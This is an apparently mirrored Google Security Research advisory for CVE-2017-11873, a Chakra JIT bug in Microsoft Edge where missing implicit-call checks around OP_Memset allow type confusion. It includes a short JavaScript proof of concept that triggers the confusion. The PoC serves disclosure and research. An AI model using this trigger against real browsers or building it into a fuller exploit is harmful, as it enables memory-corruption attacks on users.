Microsoft Edge Chakra JIT Bailout Generation

2017-11-16T00:00:00
ID PACKETSTORM:145010
Type packetstorm
Reporter Google Security Research
Modified 2017-11-16T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: JIT: Bailouts must be generated for OP_Memset   
  
CVE-2017-11873  
  
  
function opt(a, b, v) {  
if (b.length < 1)  
return;  
  
for (let i = 0; i < a.length; i++)  
a[i] = v;  
  
b[0] = 2.3023e-320;  
}  
  
The above JavaScript code is JITed as follows:  
  
... CHECKING THE TYPE OF B ...  
OP_Memset(a, v, a.length);  
b[0] = 2.3023e-320;  
  
But there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of "b" was changed after the "OP_Memset" called.  
  
The PoC shows that it can result in type confusion.  
  
PoC:  
function opt(a, b, v) {  
if (b.length < 1)  
return;  
  
for (let i = 0; i < a.length; i++)  
a[i] = v;  
  
b[0] = 2.3023e-320;  
}  
  
function main() {  
for (let i = 0; i < 1000; i++) {  
opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});  
}  
  
let a = new Uint8Array(100);  
let b = [1.1, 2.2, 3.3];  
opt(a, b, {  
valueOf: () => {  
b[0] = {};  
return 0;  
}  
});  
  
print(b[0]);  
}  
  
main();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`